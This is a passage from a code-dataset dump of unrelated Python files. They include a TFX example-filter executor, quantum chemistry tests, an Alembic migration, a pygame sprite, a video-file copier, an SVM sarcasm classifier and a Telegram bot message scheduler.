exec_properties)\n\n    examples = input_dict[EXAMPLES_KEY]\n\n    # Priority is as follows:\n    # 1. default value\n    # 2. from PipelineConfiguration\n    # 3. 
from exec_properties\n\n    splits_to_transform = []\n    predicate_fn = None\n\n    predicate_fn_key = exec_properties[\n      PREDICATE_FN_KEY_KEY] if PREDICATE_FN_KEY_KEY in exec_properties else PREDICATE_FN_KEY\n\n    splits_to_copy = artifact_utils.decode_split_names(\n      artifact_utils.get_single_instance(examples).split_names)\n\n    if PIPELINE_CONFIGURATION_KEY in input_dict:\n      pipeline_configuration_dir = artifact_utils.get_single_uri(input_dict[PIPELINE_CONFIGURATION_KEY])\n      pipeline_configuration_file = os.path.join(pipeline_configuration_dir, 'custom_config.json')\n      pipeline_configuration_str = io_utils.read_string_file(pipeline_configuration_file)\n      pipeline_configuration = json.loads(pipeline_configuration_str)\n\n      if SPLITS_TO_TRANSFORM_KEY in pipeline_configuration:\n        splits_to_transform = pipeline_configuration[SPLITS_TO_TRANSFORM_KEY]\n      else:\n        splits_to_transform = []\n\n      if SPLITS_TO_COPY_KEY in pipeline_configuration:\n        splits_to_copy = pipeline_configuration[SPLITS_TO_COPY_KEY]\n\n      if predicate_fn_key in pipeline_configuration:\n        predicate_fn = pipeline_configuration[predicate_fn_key]\n\n    # Now looking at the exec_properties\n    if SPLITS_TO_TRANSFORM_KEY in exec_properties and exec_properties[SPLITS_TO_TRANSFORM_KEY] is not None:\n      splits_to_transform = json_utils.loads(exec_properties[SPLITS_TO_TRANSFORM_KEY])\n\n    if SPLITS_TO_COPY_KEY in exec_properties and exec_properties[SPLITS_TO_COPY_KEY] is not None:\n      splits_to_copy = json_utils.loads(exec_properties[SPLITS_TO_COPY_KEY])\n\n    if PREDICATE_FN_KEY in exec_properties and exec_properties[PREDICATE_FN_KEY] is not None:\n      predicate_fn = exec_properties[PREDICATE_FN_KEY]\n\n    if predicate_fn_key in exec_properties and exec_properties[predicate_fn_key] is not None:\n      predicate_fn = exec_properties[predicate_fn_key]\n\n    # Validate we have all we need\n    if predicate_fn is None:\n      raise ValueError('\\'predicate_fn\\' is missing in exec dict.')\n\n    if EXAMPLES_KEY not in input_dict:\n      raise ValueError('\\'examples\\' is missing in input dict.')\n\n    if FILTERED_EXAMPLES_KEY not in output_dict:\n      raise ValueError('\\'filtered_examples\\' is missing in output dict.')\n\n    output_artifact = artifact_utils.get_single_instance(output_dict[FILTERED_EXAMPLES_KEY])\n    output_artifact.split_names = artifact_utils.encode_split_names(splits_to_transform + splits_to_copy)\n\n    example_uris = {}\n\n    for split in splits_to_transform:\n      data_uri = artifact_utils.get_split_uri(examples, split)\n      example_uris[split] = data_uri\n\n    # copy over the splits we don't want to transform ('splits_to_copy')\n    utils.copy_over(examples, output_artifact, splits_to_copy)\n\n    self._run_filtering(example_uris,\n                        output_artifact=output_artifact,\n                        predicate_fn=predicate_fn)\n\n    logging.info('Filter generates filtered examples to %s', output_artifact.uri)\n\n  def _run_filtering(self,\n                     example_uris: Mapping[Text, Text],\n                     predicate_fn: Text,\n                     output_artifact: Artifact) -> None:\n    \"\"\"Runs predicate-based filtering on the given example data.\n    Args:\n      example_uris: Mapping of example split name to example uri.\n      predicate_fn: function to decide if an example must be kept.\n      output_artifact: Output artifact.\n    Returns:\n      None\n    \"\"\"\n\n    d = {}\n    exec(predicate_fn, globals(), d)  # how ugly is that?\n    predicate = d['predicate']\n\n    with self._make_beam_pipeline() as pipeline:\n      for split_name, example_uri in example_uris.items():\n        data_list = [(\n            pipeline | 'ReadData[{}]'.format(split_name) >> beam.io.ReadFromTFRecord(\n          file_pattern=io_utils.all_files_pattern(example_uri)))]\n\n        
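# destination prefix for this split's filtered TFRecord shards (written as gzipped files below)\n        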
dest_path = os.path.join(artifact_utils.get_split_uri([output_artifact], split_name),\n                                 _FILTERED_EXAMPLES_FILE_PREFIX)\n\n        _ = (\n            [data for data in data_list]\n            | 'FlattenExamples ({})'.format(split_name) >> beam.Flatten(pipeline=pipeline)\n            | 'ParseExamples ({})'.format(split_name) >> beam.Map(tf.train.Example.FromString)\n            | 'Filter ({})'.format(split_name) >> beam.Filter(predicate)\n            | 'WriteFilteredExamples ({})'.format(split_name) >> beam.io.WriteToTFRecord(\n          dest_path,\n          file_name_suffix='.gz',\n          coder=beam.coders.ProtoCoder(tf.train.Example)))\n        logging.info('Filtering result written to %s.', dest_path)\n","repo_name":"ssoudan/tfx_x","sub_path":"tfx_x/components/examples/filter/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42666900893","text":"import numpy as np\n\ndef digest_indices(ktn, indices):\n\n    output = None\n\n    if indices == 'all':\n        output = np.arange(ktn.n_nodes, dtype=int)\n    else:\n        output = np.array(indices)\n\n    return output\n\n","repo_name":"uibcdf/OpenTN-Old","sub_path":"openktn_old/old/utils/edges.py","file_name":"edges.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70251817124","text":"#! single-point UHF-MP2/cc-pVDZ on NH2\n# ROHF-MP2 is not available in NWChem\nimport os\nimport sys\n\nimport pytest\n\nimport qcdb\n\nfrom ..utils import *\n\n\ndef check_uhf_mp2(return_value, is_5050):\n    ref = -55.566057523877\n    mp2_tot = -55.711202243414\n    mp2_corl = -0.145144719537\n    scs_tot = -55.7299679\n    scs_corl = -0.1639104\n    mp2os = -0.1351989\n    mp2ss = -0.0108263\n    a5050corl = 0.5 * (mp2os + mp2ss)\n    a5050tot = a5050corl + ref\n\n    assert compare_values(ref, qcdb.variable(\"HF TOTAL ENERGY\"), 5, \"scf\")\n    assert compare_values(mp2_tot, qcdb.variable(\"MP2 TOTAL ENERGY\"), 5, \"mp2 tot\")\n    assert compare_values(mp2_corl, qcdb.variable(\"MP2 CORRELATION ENERGY\"), 5, \"mp2 corl\")\n    assert compare_values(scs_tot, qcdb.variable(\"SCS-MP2 TOTAL ENERGY\"), 5, \"scs mp2 tot\")\n    assert compare_values(scs_corl, qcdb.variable(\"SCS-MP2 CORRELATION ENERGY\"), 5, \"scs mp2 corl\")\n    assert compare_values(mp2ss, qcdb.variable(\"MP2 SAME-SPIN CORRELATION ENERGY\"), 5, \"mp2 ss\")\n    assert compare_values(mp2os, qcdb.variable(\"MP2 OPPOSITE-SPIN CORRELATION ENERGY\"), 5, \"mp2 os\")\n    # if is_5050:\n    #    assert compare_values(a5050corl, qcdb.variable('CUSTOM SCS-MP2 CORRELATION ENERGY'), 5, 'mp2 scscorl')\n    #    assert compare_values(a5050tot, qcdb.variable('CUSTOM SCS-MP2 TOTAL ENERGY'), 5, 'mp2 scstot')\n\n\n@using(\"nwchem\")\n@pytest.mark.xfail(True, reason=\"scs vars NYI\", run=True)\ndef test_1_mp2_5050no():\n    nh2 = qcdb.set_molecule(\n        \"\"\"\n        N 0.08546 -0.00020 -0.05091\n        H -0.25454 -0.62639 0.67895\n        H -0.25454 -0.31918 -0.95813\n        \"\"\"\n    )\n\n    qcdb.set_options(\n        {\n            \"basis\": \"cc-pvdz\",\n            #'scf__e_convergence': 1.0e-8,\n            \"nwchem_scf__UHF\": True,\n            \"nwchem_scf__nopen\": 1,\n            \"nwchem_scf__maxiter\": 80,\n            \"nwchem_scf__thresh\": 1.0e-8,\n        }\n    )\n    print(\"Testing hf...\")\n    val = qcdb.energy(\"nwc-mp2\", local_options={\"memory\": 3})\n    check_uhf_mp2(val, is_5050=False)\n\n\n# @using(\"nwchem\")\n# def test_2_mp2_5050yes():\n#    qcdb.set_options({\n#        'basis': 'cc-pvdz',\n#        'memory': '3000 mb',\n#'scf__e_convergence': 1.0e-8,\n#        'nwchem_scf__UHF': True,\n#        'nwchem_scf__nopen': 1,\n#        'nwchem_scf__maxiter': 80,\n#        
'nwchem_scf__thresh': 1.0e-8,\n#    })\n#    print('Testing mp2...')\n#    val = qcdb.energy('nwc-mp2')\n#    check_uhf_mp2(val, is_5050=True)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/tests/nwchem_tests/test_sp_uhf_mp2.py","file_name":"test_sp_uhf_mp2.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"15331024055","text":"\"\"\"Add user query session table\n\nRevision ID: 213b541d942f\nRevises: 853e0e8aa6a0\nCreate Date: 2019-08-23 17:05:30.862737\nRevised 2019-09-30\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '213b541d942f'\ndown_revision = '853e0e8aa6a0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table(\n        'user_query_session',\n        sa.Column('query_uuid', sa.String(), nullable=False),\n        sa.Column('user_id', sa.Integer(), nullable=True),\n        sa.Column('query_blob', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n        sa.ForeignKeyConstraint(['user_id'], ['user.id'], name='valid_user'),\n        sa.PrimaryKeyConstraint('query_uuid'),\n    )\n\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('user_query_session')\n    # ### end Alembic commands ###\n","repo_name":"Zenysis/Harmony","sub_path":"web/server/migrations/versions/213b541d942f_add_user_query_sessions_table.py","file_name":"213b541d942f_add_user_query_sessions_table.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"7355410948","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n    def __init__(self,screen,ai_setting):\n        super().__init__()\n        self.screen=screen\n        self.ai_setting=ai_setting\n        self.image=pygame.image.load('images/ship.bmp')\n        self.rect=self.image.get_rect()#get the ship's bounding rectangle\n        self.screen_rect=self.screen.get_rect()#get the screen's rectangle\n        #place the ship at the bottom center of the screen\n        self.rect.centerx=self.screen_rect.centerx\n        self.rect.bottom=self.screen_rect.bottom\n        self.moving_right=False\n        self.moving_left=False\n        #store the ship's center position as a float for fine-grained speed control\n        self.center=float(self.rect.centerx)\n    #draw the ship\n    def blitme(self):\n        self.screen.blit(self.image,self.rect)\n    \n    #update the ship's position\n    def update(self):\n        if self.moving_right and self.rect.right<self.screen_rect.right:\n            self.center+=self.ai_setting.ship_speed_factor\n        if self.moving_left and self.rect.left>self.screen_rect.left:\n            self.center-=self.ai_setting.ship_speed_factor\n        self.rect.centerx=self.center\n\n    def center_ship(self):\n        self.center=self.screen_rect.centerx\n    ","repo_name":"gabrielzhen/MyPythonProject","sub_path":"MyPythonProject/practic/book_quikpython/python/alien_invasion/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13676606892","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May  1 13:18:16 2022\n\n@author: bradenlimb\n\"\"\"\n#%% Import Modules\nfrom IPython import get_ipython\nget_ipython().run_line_magic('reset','-sf')\n\n# import pandas as pd\n# import sys\nimport datetime\nbegin_time = datetime.datetime.now()\nimport shutil\nimport os\nfrom tqdm import tqdm\nimport glob\n\nimport pytz\nfrom win32com.propsys import propsys, pscon\n\n#%% Base Location\n\nsource_root = r'C:\Users\Braden Limb\Downloads\iCloud Photos (1)\iCloud Photos'\ntarget_root = r'E:\Video 
Diaries'\n\n\n\nrename_existing_files = False\nif rename_existing_files:\n filenames = [ item for item in os.listdir(target_root) if os.path.isfile(os.path.join(target_root, item)) ]\n filenames = [ x for x in filenames if \"._\" not in x ]\n filenames = [ x for x in filenames if \"IMG_\" in x ]\n #filenames = [filenames[1]]\n for filename in tqdm(filenames):\n \n filepath = f'{target_root}\\{filename}'\n properties = propsys.SHGetPropertyStoreFromParsingName(filepath)\n dt = properties.GetValue(pscon.PKEY_Media_DateEncoded).GetValue()\n \n if not isinstance(dt, datetime.datetime):\n # In Python 2, PyWin32 returns a custom time type instead of\n # using a datetime subclass. It has a Format method for strftime\n # style formatting, but let's just convert it to datetime:\n dt = datetime.datetime.fromtimestamp(int(dt))\n dt = dt.replace(tzinfo=pytz.timezone('UTC'))\n dt_local = dt.astimezone(pytz.timezone('America/Denver'))\n \n dt_local_str = dt_local.strftime('%Y-%m-%d')\n new_filename = f'{dt_local_str} Video Diary{filename[-4:]}'\n target_file = f'{target_root}\\{new_filename}'\n shutil.copyfile(filepath, target_file)\n\nmove_files = True\nif move_files:\n filenames = [ item for item in os.listdir(source_root) if os.path.isfile(os.path.join(source_root, item)) ]\n filenames = [ x for x in filenames if \"._\" not in x ]\n filenames = [ x for x in filenames if \"IMG_\" in x ]\n # filenames = [filenames[1]]\n for filename in tqdm(filenames):\n \n filepath = f'{source_root}\\{filename}'\n properties = propsys.SHGetPropertyStoreFromParsingName(filepath)\n dt = properties.GetValue(pscon.PKEY_Media_DateEncoded).GetValue()\n \n if not isinstance(dt, datetime.datetime):\n # In Python 2, PyWin32 returns a custom time type instead of\n # using a datetime subclass. 
It has a Format method for strftime\n            # style formatting, but let's just convert it to datetime:\n            dt = datetime.datetime.fromtimestamp(int(dt))\n        dt = dt.replace(tzinfo=pytz.timezone('UTC'))\n        dt_local = dt.astimezone(pytz.timezone('America/Denver'))\n        \n        dt_local_str = dt_local.strftime('%Y-%m-%d')\n        new_filename = f'{dt_local_str} Video Diary{filename[-4:]}'\n        target_file = f'{target_root}\{new_filename}'\n        if os.path.exists(target_file):\n            target_split = os.path.splitext(target_file)\n            numoffiles = len(glob.glob(rf'{target_split[0]}*'))\n            target_file = target_split[0] + f'_{numoffiles+1}' + target_split[1]\n        shutil.copyfile(filepath, target_file)\n\n#%% End of Code\nexecute_time = datetime.datetime.now() - begin_time\nprint('')\nprint('Code execution time: ', execute_time)\n","repo_name":"bradenlimb/Photo-Video-Copier","sub_path":"video_diaries_copier.py","file_name":"video_diaries_copier.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27695523057","text":"import game\nimport numpy as np\nimport random\nfrom collections import Counter\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport math\n\nITERATIONS = 300000\n\n#LFA for full model (10*21*2)\n\nhit = True\nstick = False\nactions = [hit, stick]\n\nalpha = 0.01\nepsilon = 0.05\nlmd = 0.8\ntheta = np.random.randn(420).reshape((420,1))\n\ndef psi(state, action):\n    \n    if state.player < 1 or state.player > 21:\n        return np.zeros((420, 1))\n    \n    dealers = [int(state.dealer == x + 1) for x in range(0, 10)]\n    players = [int(state.player == x + 1) for x in range(0, 21)]\n    actions = [int(action == True), int(action == False)]\n    \n    psi = [1 if (i == 1 and j == 1 and k == 1) else 0\n           for i in dealers for j in players for k in actions]\n\n    return np.array(psi).reshape((420, 1))\n    \ndef Q(state, action, theta):\n    return np.matmul(psi(state, action).T, theta)\n\ndef V(q):\n    return np.max(q, axis=2)  \n    \ndef epsilon_greedy(state, theta):\n    \n    if np.random.random() < epsilon:\n        return np.random.choice(actions)\n    else:\n        return bool(np.argmax([Q(state, a, theta) for a in actions]))\n    \ndef generate_Q(weight):\n    \n    Q_matrix = np.zeros((10, 21, 2))\n    \n    for i in range(0, 10, 1):\n        for j in range(0, 21, 1):\n            for k in range(0, 2, 1):\n                Q_matrix[i][j][k] = Q(game.State(i+1, j+1, True), bool(k), weight)\n    \n    return Q_matrix\n    \nif __name__ == \"__main__\":  \n\n    Q_star = np.load('Q_star.npy')\n\n    for k in range(1, ITERATIONS):\n\n        terminal = False\n        \n        state = game.initialise_state()\n        action = epsilon_greedy(state, theta)\n        \n        E_matrix = np.zeros_like(theta)\n        \n        while not terminal:  \n            # take action a, observe r, s'\n            next_state, reward = game.step(state, action)\n            # choose a' from s' using policy from Q\n            \n            terminal = next_state.terminal\n            \n            if not terminal:\n                next_action = epsilon_greedy(next_state, theta)\n                delta = reward + Q(next_state, next_action, theta) - Q(state, action, theta)\n            else:\n                delta = reward - Q(state, action, theta)\n            \n            E_matrix = np.add(lmd * E_matrix, psi(state, action))\n\n            theta += alpha * delta * E_matrix\n            \n            if not terminal:\n                state = next_state\n                action = next_action\n        \n        if k % 10000 == 0:\n            print(\"MSE: \" + str(round(np.sum((Q_star - generate_Q(theta)) ** 2),2)))\n\n    game.visualise(V(generate_Q(theta))) 
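\n\n# added note: psi is a one-hot indicator over all 420 (dealer, player, action) cells, so this linear SARSA(lambda) update is exactly equivalent to the tabular case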
","repo_name":"Soundpulse/easy21-rl","sub_path":"lfa-full.py","file_name":"lfa-full.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73299016484","text":"import argparse\nimport json\nimport os\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\n\nfrom config import CONFIG_BY_KEY\nfrom data_loader import DataLoader\nfrom data_loader import DataHelper\n\nRESULT_FILE = \"./output/{}.json\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config-key', default='', choices=list(CONFIG_BY_KEY.keys()))\n return parser.parse_args()\n\n\nargs = parse_args()\nprint(\"Args:\", args)\n\n# Load config\nconfig = CONFIG_BY_KEY[args.config_key]\n\n# Load data\ndata = DataLoader(config)\n\n\ndef svm_train(train_input, train_output):\n clf = make_pipeline(\n StandardScaler() if config.svm_scale else FunctionTransformer(lambda x: x, validate=False),\n svm.SVC(C=config.svm_c, gamma='scale', kernel='rbf')\n )\n\n return clf.fit(train_input, np.argmax(train_output, axis=1))\n\n\ndef svm_test(clf, test_input, test_output):\n\n probas = clf.predict(test_input)\n y_pred = probas\n y_true = np.argmax(test_output, axis=1)\n\n # To generate random scores\n # y_pred = np.random.randint(2, size=len(y_pred))\n\n # To generate majority baseline\n # y_pred = [0]*len(y_pred)\n \n result_string = classification_report(y_true, y_pred, digits=3)\n print(confusion_matrix(y_true, y_pred))\n print(result_string)\n return classification_report(y_true, y_pred, output_dict=True, digits=3), result_string\n\n\n\ndef trainIO(train_index, test_index):\n\n # Prepare data\n train_input, train_output = data.getSplit(train_index)\n test_input, test_output = data.getSplit(test_index)\n\n datahelper = DataHelper(train_input, train_output, test_input, test_output, config, data)\n\n train_input = np.empty((len(train_input), 0))\n test_input = np.empty((len(test_input), 0))\n\n if config.use_target_text:\n\n if config.use_bert:\n train_input = np.concatenate([train_input, datahelper.getTargetBertFeatures(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetBertFeatures(mode='test')], axis=1)\n else:\n train_input = np.concatenate([train_input,\n np.array([datahelper.pool_text(utt)\n for utt in datahelper.vectorizeUtterance(mode='train')])], axis=1)\n test_input = np.concatenate([test_input,\n np.array([datahelper.pool_text(utt)\n for utt in datahelper.vectorizeUtterance(mode='test')])], axis=1)\n\n if config.use_target_video:\n train_input = np.concatenate([train_input, datahelper.getTargetVideoPool(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetVideoPool(mode='test')], axis=1)\n\n if config.use_target_audio:\n train_input = np.concatenate([train_input, datahelper.getTargetAudioPool(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetAudioPool(mode='test')], axis=1)\n\n if train_input.shape[1] == 0:\n print(\"Invalid modalities\")\n exit(1)\n\n # Aux input\n\n if config.use_author:\n train_input_author = datahelper.getAuthor(mode=\"train\")\n test_input_author = datahelper.getAuthor(mode=\"test\")\n\n train_input = np.concatenate([train_input, train_input_author], axis=1)\n test_input = np.concatenate([test_input, 
test_input_author], axis=1)\n\n if config.use_context:\n if config.use_bert:\n train_input_context = datahelper.getContextBertFeatures(mode=\"train\")\n test_input_context = datahelper.getContextBertFeatures(mode=\"test\")\n else:\n train_input_context = datahelper.getContextPool(mode=\"train\")\n test_input_context = datahelper.getContextPool(mode=\"test\")\n\n train_input = np.concatenate([train_input, train_input_context], axis=1)\n test_input = np.concatenate([test_input, test_input_context], axis=1)\n\n \n train_output = datahelper.oneHotOutput(mode=\"train\", size=config.num_classes)\n test_output = datahelper.oneHotOutput(mode=\"test\", size=config.num_classes)\n\n return train_input, train_output, test_input, test_output\n\n\n\ndef trainSpeakerIndependent(model_name=None):\n\n config.fold = \"SI\"\n \n (train_index, test_index) = data.getSpeakerIndependent()\n train_input, train_output, test_input, test_output = trainIO(train_index, test_index)\n\n clf = svm_train(train_input, train_output)\n svm_test(clf, test_input, test_output)\n\n\n\ndef trainSpeakerDependent(model_name=None):\n \n # Load data\n data = DataLoader(config)\n\n # Iterating over each fold\n results=[]\n for fold, (train_index, test_index) in enumerate(data.getStratifiedKFold()):\n\n # Present fold\n config.fold = fold+1\n print(\"Present Fold: {}\".format(config.fold))\n\n train_input, train_output, test_input, test_output = trainIO(train_index, test_index)\n\n clf = svm_train(train_input, train_output)\n result_dict, result_str = svm_test(clf, test_input, test_output)\n\n results.append(result_dict)\n\n # Dumping result to output\n if not os.path.exists(os.path.dirname(RESULT_FILE)):\n os.makedirs(os.path.dirname(RESULT_FILE))\n with open(RESULT_FILE.format(model_name), 'w') as file:\n json.dump(results, file)\n\n\ndef printResult(model_name=None):\n\n results = json.load(open(RESULT_FILE.format(model_name), \"rb\"))\n\n weighted_precision, weighted_recall = [], []\n weighted_fscores = []\n\n print(\"#\"*20)\n for fold, result in enumerate(results):\n weighted_fscores.append(result[\"weighted avg\"][\"f1-score\"])\n weighted_precision.append(result[\"weighted avg\"][\"precision\"])\n weighted_recall.append(result[\"weighted avg\"][\"recall\"])\n\n print(\"Fold {}:\".format(fold+1))\n print(\"Weighted Precision: {} Weighted Recall: {} Weighted F score: {}\".format(result[\"weighted avg\"][\"precision\"],\n result[\"weighted avg\"][\"recall\"],\n result[\"weighted avg\"][\"f1-score\"]))\n print(\"#\"*20)\n print(\"Avg :\")\n print(\"Weighted Precision: {:.3f} Weighted Recall: {:.3f} Weighted F score: {:.3f}\".format(np.mean(weighted_precision),\n np.mean(weighted_recall),\n np.mean(weighted_fscores)))\n \n\nif __name__ == \"__main__\":\n\n if config.speaker_independent:\n trainSpeakerIndependent(model_name=config.model)\n else:\n for _ in range(config.runs):\n trainSpeakerDependent(model_name=config.model)\n printResult(model_name=config.model)\n","repo_name":"declare-lab/multimodal-deep-learning","sub_path":"MUStARD/train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":570,"dataset":"github-code","pt":"52"} +{"seq_id":"42666900893","text":"'''\ndear future me I am so sorry for the mess you are about to see.\nI have worked for so long on this very simple idea rewriting it a bunch of times\nthere is still a few of totaly useless things here I am too afraid to touch \n\nregardless this seems to work and while I cant test it at 
scale I think it should work at scale too\n\nfor future refrence this is why we dont pretend to know java... you are a python devloper for fuck sake write prosedural code\n'''\n\nimport json\n\nimport os\nfrom os.path import join,exists,getctime\nfrom datetime import datetime\n\nfrom telegram import ForceReply, Update\nfrom telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters\n\nimport asyncio \n\nimport openai \nimport json\n\nimport os\nfrom os.path import join,exists\nfrom datetime import datetime\nimport time\n\nfrom telegram import ForceReply, Update\nfrom telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters\n\nimport asyncio\n\nfrom calander import s_in_d\n\n\nasync def send_message(bot,user_id,message):\n #sends and logs a message\n path=join('users',str(user_id))\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n chat_id=user_info['chat_id']\n \n t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n\n await bot.send_message(chat_id, message)\n with open(join(path,'send_messages',t), 'w') as f:\n json.dump({'chat_id': chat_id, 'message': message}, f)\n \n\n\nasync def log_update(user_id,update):\n path=join('users',str(user_id))\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n chat_id=user_info['chat_id']\n \n t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n\n with open(join(path,'recived_messages',t), 'w') as f:\n json.dump({'chat_id': chat_id, 'message': update.message.text}, f) \n\nclass FolowUpCalls:\n user_threads={}\n \n @classmethod\n def set_func(cls,func):\n cls.func=[func]\n #this is here so that scedualed responses work even after a server restart\n \n def __init__(self, bot,user_id, message, delay):\n if message==None:\n return\n try:\n self.user_threads[user_id].cancel()\n except KeyError:\n pass\n\n self.bot = bot\n self.user_id=user_id\n self.message = message\n self.delay = delay\n\n self.path=join('users',str(self.user_id),'scedualed_respond.json')\n with open(self.path, 'w') as f:\n json.dump({'message': self.message,'delay': delay,'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n self.task = asyncio.create_task(self.run())\n self.user_threads[user_id]=self\n self.done_waiting=False\n\n async def run(self):\n await asyncio.sleep(self.delay)\n self.done_waiting=True\n delay,notes=await self.func[0](self.bot,self.user_id, self.message)\n \n if notes==None:\n return\n\n FolowUpCalls(self.bot,self.user_id,notes,delay)\n #os.remove(self.path)\n #return val\n #with open(self.path, 'w') as f:\n # json.dump({'chat_id': self.chat_id, 'message': self.message, 'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n \n\n def cancel(self):\n #if not self.task.done():\n if not self.done_waiting:\n self.task.cancel()\n return\n if exists(self.path):\n os.remove(self.path)\n\nclass Responder():\n '''\n this class handles the severs reaction to a single message. 
\n    it should handle all the ids and basic logging for us \n\n    note that we still need to use async and manage our own usage cap \n    sending messages is also not in the scope of this class\n    '''\n    def __init__(self,response,reminder,errored_reminder,start):\n        self.wrapped_response=response #this will always execute to completion before new messages are considered \n        self.wrapped_reminder=reminder #this will wait and get interrupted whenever a new message is sent\n        self.wrapped_errored_reminder=errored_reminder #this will execute if a reminder was server errored\n        self.wrapped_start=start #this is executed when a new user shows up\n\n        #self.user_threads = {}\n\n    async def respond(self,update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n        \"\"\"main response function\"\"\"\n        user = update.effective_user\n        path=join('users',str(user.id))\n\n        try:\n            FolowUpCalls.user_threads[user.id].cancel()\n        except KeyError:\n            pass\n\n        asyncio.create_task(log_update(user.id,update))\n        #response_text='got message'#await gpt_logic(update)\n        delay,notes=await self.wrapped_response(context.bot,user.id,update.message.text)\n\n        w=FolowUpCalls(context.bot,user.id,notes,delay)\n        #self.user_threads[user.id]=w\n\n        #await w.task\n\n\n    async def start(self,update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n        \"\"\"Send a message when the command /start is issued.\"\"\"\n        user = update.effective_user\n        path=join('users',str(user.id))\n        os.makedirs(path,exist_ok=True)\n        \n        if(not exists(join(path,'init.json'))):\n            print('new user joined!')\n            with open(join(path,'init.json'),'w') as f:\n                json.dump({'name':user.name,'time':datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n            \n            os.makedirs(join(path,'send_messages'))\n            os.makedirs(join(path,'recived_messages'))\n\n        \n        # Update chat_id\n        with open(join(path,'init.json'),'r') as f:\n            user_info = json.load(f)\n        user_info['chat_id'] = update.message.chat_id\n        with open(join(path,'init.json'),'w') as f:\n            json.dump(user_info, f)\n        \n        #await update.message.reply_html(rf\"Hi {user.mention_html()}!\", reply_markup=ForceReply(selective=True))\n        await self.wrapped_start(context.bot,user.id,user)#send_message(context.bot,user.id,rf\"Hi {user.name}!\")\n\n\n    async def initialize_tasks(self,application):\n        #this is for after a restart so that all the waiting code runs\n        print('looking for callbacks')\n        bot=application.bot\n        user_directories = [d for d in os.listdir('users') if os.path.isdir(join('users', d))]\n        for user_dir in user_directories:\n            path = join('users', user_dir)\n            user_id=int(user_dir)\n            if exists(join(path, 'scedualed_respond.json')):\n                with open(join(path, 'scedualed_respond.json'), 'r') as f:\n                    respond_info = json.load(f)\n                time_sent = datetime.strptime(respond_info['time'], '%Y-%m-%d %H:%M:%S')\n                time_now = datetime.now()\n                delay = (time_sent - time_now).total_seconds()\n                \n                if time_sent > time_now:\n                    w = FolowUpCalls( bot,user_id, respond_info['message'], delay)\n                else:\n                    delay,message=await self.wrapped_errored_reminder(bot,user_id,respond_info['message'])\n                    w = FolowUpCalls(bot,user_id,message, delay)\n\n                #self.user_threads[user_id] = w\n            else: \n                print(f'error missing response in:\\n{path}')\n        \n        print('resolved callbacks. 
running as usual')\n\n\nclass Conversation_Manager():\n    #when using this you can just override the process message method\n    convs={} \n\n    def __init__(self,path:str,bot,buffer_time=3):\n        self.semaphore = asyncio.Semaphore(1)\n\n        with open(join(path,'init.json'),'r') as f:\n            user_info = json.load(f)\n        self.chat_id=user_info['chat_id']\n        self.bot=bot\n        \n        self.path=path\n        self.save_path=join(path,'texting.txt')\n        self.last_out=0 #this is unix time\n        #self.mem_path=join(path,'scedualed_respond.json')\n        #self.lock=0\n        self.buffer_time=buffer_time\n        \n        #self.task=asyncio.create_task(asyncio.sleep(0))\n    async def lock(self):\n        await self.semaphore.acquire()\n\n    def free(self):\n        self.semaphore.release()  \n    \n    @classmethod  \n    def from_id(cls,idx,bot):\n        try:\n            return cls.convs[idx]\n        except KeyError:\n            path=join('users',str(idx))\n            ans=cls(path,bot)\n            cls.convs[idx]=ans  \n            return ans\n    \n    async def hook(self,message,path):\n        #await self.lock()\n        \n        await self.send_message(f'we got:\\n{message}')\n        #self.free()\n\n    async def _hook(self):\n        #await self.lock()\n        m=await self.done_gathering()\n        if m:\n            await self.hook(m,self.path)\n        